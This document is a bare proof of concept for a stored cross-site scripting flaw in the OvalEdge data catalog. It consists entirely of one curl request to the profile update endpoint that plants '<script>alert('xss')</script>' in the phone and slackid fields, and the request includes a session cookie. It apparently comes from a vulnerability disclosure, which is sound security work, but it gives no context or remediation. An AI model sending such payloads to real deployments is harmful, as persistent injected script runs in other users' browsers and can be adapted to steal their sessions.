❗Stored XSS

curl -k 'https://example.com/ovaledge/profile/updateProfile' \
  -H 'Accept: */*' \
  -H 'Accept-Language: en-US,en;q=0.9' \
  -H 'Connection: keep-alive' \
  -H 'Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykZH2TqJk3RBgZVKN' \
  -H 'Cookie: oe-loc=en; JSESSIONID=NzA2ZTg2YjUtYmE2OS00MTZiLTllZmItNTIzZGUxZmRmYjUy' \
  -H 'Origin: https://example.com' \
  -H 'Referer: https://example.com/ovaledge/' \
  -H 'Sec-Fetch-Dest: empty' \
  -H 'Sec-Fetch-Mode: cors' \
  -H 'Sec-Fetch-Site: same-origin' \
  -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36' \
  -H 'X-Requested-With: XMLHttpRequest' \
  -H 'sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="100", "Google Chrome";v="100"' \
  -H 'sec-ch-ua-mobile: ?0' \
  -H 'sec-ch-ua-platform: "macOS"' \
  --data-raw $'------WebKitFormBoundarykZH2TqJk3RBgZVKN\r\nContent-Disposition: form-data; name="fname"\r\n\r\nAdmin\r\n------WebKitFormBoundarykZH2TqJk3RBgZVKN\r\nContent-Disposition: form-data; name="lname"\r\n\r\nOvalEdge\r\n------WebKitFormBoundarykZH2TqJk3RBgZVKN\r\nContent-Disposition: form-data; name="email"\r\n\r\nadmin@ovaledge.com\r\n------WebKitFormBoundarykZH2TqJk3RBgZVKN\r\nContent-Disposition: form-data; name="phone"\r\n\r\n </span> <script > alert ('xss');</script >\r\n------WebKitFormBoundarykZH2TqJk3RBgZVKN\r\nContent-Disposition: form-data; name="slackid"\r\n\r\n </span> <script > alert ('xss');</script >\r\n------WebKitFormBoundarykZH2TqJk3RBgZVKN\r\nContent-Disposition: form-data; name="picture"; filename=""\r\nContent-Type: application/octet-stream\r\n\r\n\r\n------WebKitFormBoundarykZH2TqJk3RBgZVKN\r\nContent-Disposition: form-data; name="stackId"\r\n\r\n\r\n------WebKitFormBoundarykZH2TqJk3RBgZVKN\r\nContent-Disposition: form-data; name="userId"\r\n\r\nadmin\r\n------WebKitFormBoundarykZH2TqJk3RBgZVKN--\r\n' \
  --compressed